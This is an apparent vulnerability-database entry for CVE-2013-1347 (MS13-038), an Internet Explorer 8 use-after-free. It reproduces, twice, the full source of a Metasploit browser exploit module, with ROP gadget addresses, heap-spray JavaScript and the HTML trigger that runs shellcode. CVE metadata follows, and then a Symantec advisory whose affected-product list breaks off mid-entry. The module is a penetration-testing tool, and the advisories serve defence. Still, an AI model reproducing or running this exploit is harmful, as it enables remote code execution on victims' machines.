MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
2013-05-05T17:04:17
ID MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF Type metasploit Reporter Rapid7 Modified 2020-10-02T20:00:37
Description
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "8.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CGenericElement object is freed, but a
reference is kept on the Document and used again during rendering, an invalid
memory that's controllable is used, and allows arbitrary code execution under the
context of the user.
Please note: This vulnerability has been exploited in the wild on 2013 May, in
the compromise of the Department of Labor (DoL) Website.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown',
'EMH',
'juan vazquez', #RCA
'sinn3r' #RCA
],
'References' =>
[
[ 'CVE', '2013-1347' ],
[ 'OSVDB', '92993' ],
[ 'MSB', 'MS13-038' ],
[ 'US-CERT-VU', '237655' ],
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
],
'Privileged' => false,
'DisclosureDate' => '2013-05-03',
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '5.2'
os_name = 'Windows Server 2003'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
else
# OS not supported
return nil
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def get_payload(t, cli)
rop_payload = ''
# Extra junk in the end to make sure post code execution is stable.
p = payload.encoded
case t['Rop']
when :msvcrt
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
rop_payload = ''
if t.name == 'IE 8 on Windows XP SP3'
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
elsif t.name == 'IE 8 on Windows Server 2003'
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
end
else
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << p
code << rand_text_alpha(12000)
rop_payload = generate_rop_payload('java', code)
end
return rop_payload
end
def load_exploit_html(my_target, cli)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
html = %Q|
<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
#{js_mstime_malloc}
function helloWorld()
{
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}
magenta += sparkle;
document.body.contentEditable="true";
f0 = document.createElement('span');
f1 = document.createElement('span');
f2 = document.createElement('span');
document.body.appendChild(f0);
document.body.appendChild(f1);
document.body.appendChild(f2);
for (i=0; i < 20; i++) { document.createElement("img"); }
f2.appendChild(document.createElement('datalist'));
f1.appendChild(document.createElement('span'));
CollectGarbage();
f1.appendChild(document.createElement('table'));
try { f0.offsetParent=null;}
catch(e) { }
f2.innerHTML = "";
f1.innerHTML = "";
f0.appendChild(document.createElement('hr'));
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
}
</script>
</head>
<body onload="eval(helloWorld());">
<t:ANIMATECOLOR id="myanim"/>
</body>
</html>
|
return html
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
print_status("Requesting: #{uri}")
my_target = get_target(agent)
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
html = load_exploit_html(my_target, cli)
html = html.gsub(/^ {4}/, '')
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2020-10-02T20:00:37", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2020-10-15T01:38:42", "viewCount": 215, "enchantments": {"score": {"value": 9.5, "vector": "NONE", "modified": "2020-10-15T01:38:42", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1347"]}, {"type": "symantec", "idList": ["SMNTC-38195", "SMNTC-59641", "SMNTC-59162", "SMNTC-58238", "SMNTC-50218"]}, {"type": "seebug", "idList": ["SSV:60790", "SSV:60781"]}, {"type": "openvas", "idList": ["OPENVAS:803395", "OPENVAS:1361412562310803395"]}, {"type": "nessus", "idList": ["SMB_KB2847140.NASL", "SMB_NT_MS13-038.NASL"]}, {"type": "cert", "idList": ["VU:237655"]}, {"type": "saint", "idList": ["SAINT:3EF0C66878E70BB3C355385365B1DFBF", "SAINT:530FA87FA097C35D9629E058CE3C1589", "SAINT:ADB3400FCF70345A44024ACACFAE55FE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121542"]}, {"type": "threatpost", "idList": ["THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", "THREATPOST:E326C2EB9D5EFCB0D22498536DBFD41C", "THREATPOST:4AFF5B3A848221B1D20C4D3441C38E47", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", "THREATPOST:0AFCC83E8C58D8FF486D59E8F7E64FBB"]}, {"type": "zdt", "idList": ["1337DAY-ID-20741"]}, {"type": "exploitdb", "idList": ["EDB-ID:25294"]}, {"type": "attackerkb", "idList": ["AKB:D8049635-0B6A-42D4-A516-3F61BF8BB5D7", "AKB:3C7B4CF8-80C4-45A5-9363-AFAA8C364D11"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13082"]}], "modified": "2020-10-15T01:38:42", "rev": 2}, "vulnersScore": 9.5}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2013-05-03',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2021-02-02T06:06:48", "description": "Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly allocated or (2) is deleted, as exploited in the wild in May 2013.", "edition": 5, "cvss3": {}, "published": "2013-05-05T11:07:00", "title": "CVE-2013-1347", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1347"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/a:microsoft:internet_explorer:8"], "id": "CVE-2013-1347", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-14T22:39:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-1347"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Microsoft Internet Explorer version 8 is affected.\n\n### Technologies Affected\n\n * Avaya CallPilot 4.0 \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot 5.0.1 \n * Avaya Communication Server 1000 Telephony Manager 3.0 \n * Avaya Communication Server 1000 Telephony Manager 3.0.1 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0.1 \n * Avaya Conferencing Standard Edition 6.0 \n * Avaya Conferencing Standard Edition 6.0 SP1 \n * Avaya Conferencing Standard Edition 6.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.0 \n * Avaya Meeting Exchange - Client Registration Server 5.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.2 \n * Avaya Meeting Exchange - Client Registration Server 5.2.1 \n * Avaya Meeting Exchange - Client Registration Server 6.0 \n * Avaya Meeting Exchange - Recording Server 5.0 \n * Avaya Meeting Exchange - Recording Server 5.0.1 \n * Avaya Meeting Exchange - Recording Server 5.2 \n * Avaya Meeting Exchange - Recording Server 5.2.1 \n * Avaya Meeting Exchange - Recording Server 6.0 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0.1 \n * Avaya Meeting Exchange - Streaming Server 5.2 \n * Avaya Meeting Exchange - Streaming Server 5.2.1 \n * Avaya Meeting Exchange - Streaming Server 6.0 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0.1 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2.1 \n * Avaya Meeting Exchange - Web Conferencing Server 6.0 \n * Avaya Meeting Exchange - Webportal 5.0 \n * Avaya Meeting Exchange - Webportal 5.0.1 \n * Avaya Meeting Exchange - Webportal 5.2 \n * Avaya Meeting Exchange - Webportal 5.2.1 \n * Avaya Meeting Exchange - Webportal 6.0 \n * Avaya Messaging Application Server 4 \n * Avaya Messaging Application Server 5 \n * Avaya Messaging Application Server 5.0 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Application Server MM 1.1 \n * Avaya Messaging Application Server MM 2.0 \n * Avaya Messaging Application Server MM 3.0 \n * Avaya Messaging Application Server MM 3.1 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nCurrently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "modified": "2013-05-03T00:00:00", "published": "2013-05-03T00:00:00", "id": "SMNTC-59641", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/59641", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2013-1347 Use-After-Free Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T14:30:54", "bulletinFamily": "software", "cvelist": ["CVE-2013-1347", "CVE-2013-1493"], "description": "### Description\n\nOracle Java SE is prone to a remote code execution vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the application. This vulnerability affects the following supported versions: JDK and JRE 7 Update 15 and prior JDK and JRE 6 Update 41 and prior JDK and JRE 5.0 Update 40 and prior\n\n### Technologies Affected\n\n * Apple Mac OS X 10.6.8 \n * Apple Mac OS X 10.7 \n * Apple Mac OS X 10.7.1 \n * Apple Mac OS X 10.7.2 \n * Apple Mac OS X 10.7.3 \n * Apple Mac OS X 10.7.4 \n * Apple Mac OS X 10.7.5 \n * Apple Mac OS X 10.8 \n * Apple Mac OS X 10.8.1 \n * Apple Mac OS X 10.8.2 \n * Apple Mac OS X Server 10.0.1 \n * Apple Mac OS X Server 10.6.8 \n * Apple Mac OS X Server 10.7 \n * Apple Mac OS X Server 10.7.1 \n * Apple Mac OS X Server 10.7.2 \n * Apple Mac OS X Server 10.7.3 \n * Apple Mac OS X Server 10.7.4 \n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 5.2.4 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Enablement Services 6.1.2 \n * Avaya Aura Application Enablement Services 6.2 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Application Server 5300 SIP Core 2.1 \n * Avaya Aura Application Server 5300 SIP Core 3.0 \n * Avaya Aura Communication Manager 5.2 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Communication Manager 5.2.1 SP2 \n * Avaya Aura Communication Manager 5.2.1 SP5 \n * Avaya Aura Communication Manager 6.0 \n * Avaya Aura Communication Manager 6.0.1 \n * Avaya Aura Communication Manager 6.2 \n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Communication Manager Utility Services 6.1 SP 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.2 \n * Avaya Aura Communication Manager Utility Services 6.2.4.0.15 \n * Avaya Aura Communication Manager Utility Services 6.2.5.0.15 \n * Avaya Aura Conferencing 7.0 \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Experience Portal 6.0 SP1 \n * Avaya Aura Experience Portal 6.0 SP2 \n * Avaya Aura Experience Portal 6.0.1 \n * Avaya Aura Experience Portal 6.0.2 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Messaging 6.1 \n * Avaya Aura Messaging 6.1.1 \n * Avaya Aura Messaging 6.2 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura Presence Services 6.1.2 \n * Avaya Aura SIP Enablement Services 5.0 \n * Avaya Aura SIP Enablement Services 5.1 \n * Avaya Aura SIP Enablement Services 5.2 \n * Avaya Aura SIP Enablement Services 5.2.1 \n * Avaya Aura Session Manager 1.1 \n * Avaya Aura Session Manager 1.1.1 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 5.2 SP1 \n * Avaya Aura Session Manager 5.2 SP2 \n * Avaya Aura Session Manager 5.2.1 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.0.1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura Session Manager 6.1.5 \n * Avaya Aura Session Manager 6.2 \n * Avaya Aura Session Manager 6.2 SP1 \n * Avaya Aura Session Manager 6.2.1 \n * Avaya Aura Session Manager 6.2.2 \n * Avaya Aura Session Manager 6.3 \n * Avaya Aura System Manager 5.2 \n * Avaya Aura System Manager 6.0 \n * Avaya Aura System Manager 6.0 SP1 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Manager 6.1.5 \n * Avaya Aura System Manager 6.2 \n * Avaya Aura System Manager 6.2 SP3 \n * Avaya Aura System Manager 6.2.3 \n * Avaya Aura System Manager 6.3 \n * Avaya Aura System Platform 1.0 \n * Avaya Aura System Platform 6.0 \n * Avaya Aura System Platform 6.0 SP2 \n * Avaya Aura System Platform 6.0 SP3 \n * Avaya Aura System Platform 6.0.1 \n * Avaya Aura System Platform 6.0.2 \n * Avaya Aura System Platform 6.0.3.0.3 \n * Avaya Aura System Platform 6.0.3.8.3 \n * Avaya Aura System Platform 6.0.3.9.3 \n * Avaya Aura System Platform 6.2 \n * Avaya Aura System Platform 6.2 SP1 \n * Avaya Aura System Platform 6.2.1 \n * Avaya Aura System Platform 6.2.1.0.9 \n * Avaya Call Management System R 15 \n * Avaya Call Management System R 16 \n * Avaya Conferencing Standard Edition 6.0 \n * Avaya Conferencing Standard Edition 6.0 SP1 \n * Avaya Conferencing Standard Edition 6.0.1 \n * Avaya IP Office Application Server 8.0 \n * Avaya IP Office Application Server 8.1 \n * Avaya IP Office Server Edition 8.0 \n * Avaya IP Office Server Edition 8.1 \n * Avaya IQ 4.0 \n * Avaya IQ 4.1.0 \n * Avaya IQ 4.2 \n * Avaya IQ 5 \n * Avaya IQ 5.1 \n * Avaya IQ 5.1.1 \n * Avaya IQ 5.2 \n * Avaya IR 4.0 \n * Avaya Meeting Exchange - Client Registration Server 6.0 \n * Avaya Meeting Exchange - Recording Server 6.0 \n * Avaya Meeting Exchange - Streaming Server 6.0 \n * Avaya Meeting Exchange - Web Conferencing Server 6.0 \n * Avaya Meeting Exchange - Webportal 6.0 \n * Avaya Message Networking 5.2 \n * Avaya Message Networking 5.2 SP1 \n * Avaya Message Networking 5.2 SP3 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Message Networking 5.2.5 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Storage Server 5.2.12 \n * Avaya Messaging Storage Server 5.2.13 \n * Avaya Messaging Storage Server 5.2.14 \n * Avaya Messaging Storage Server 5.2.2 \n * Avaya Messaging Storage Server 5.2.8 \n * Avaya Messaging Storage Server 5.2.9 \n * Avaya Proactive Contact 5.0 \n * Avaya Proactive Contact 5.1 \n * Avaya Voice Portal 5.0 \n * Avaya Voice Portal 5.0 SP1 \n * Avaya Voice Portal 5.0 SP2 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1 SP1 \n * Avaya Voice Portal 5.1 SP3 \n * Avaya Voice Portal 5.1 Sp2 \n * Avaya Voice Portal 5.1.1 \n * Avaya Voice Portal 5.1.2 \n * Avaya Voice Portal 5.1.3 \n * CentOS CentOS 5 \n * CentOS CentOS 6 \n * Fedoraproject Fedora 17 \n * Fedoraproject Fedora 18 \n * Gentoo Linux \n * HP HP-UX B.11.11 \n * HP HP-UX B.11.31 \n * HP NonStop Server H06.15.00 \n * HP NonStop Server H06.15.01 \n * HP NonStop Server H06.15.02 \n * HP NonStop Server H06.16.00 \n * HP NonStop Server H06.16.01 \n * HP NonStop Server H06.16.02 \n * HP NonStop Server H06.17.00 \n * HP NonStop Server H06.17.01 \n * HP NonStop Server H06.17.02 \n * HP NonStop Server H06.17.03 \n * HP NonStop Server H06.18.00 \n * HP NonStop Server H06.18.01 \n * HP NonStop Server H06.18.02 \n * HP NonStop Server H06.19.00 \n * HP NonStop Server H06.19.01 \n * HP NonStop Server H06.19.02 \n * HP NonStop Server H06.19.03 \n * HP NonStop Server H06.20.00 \n * HP 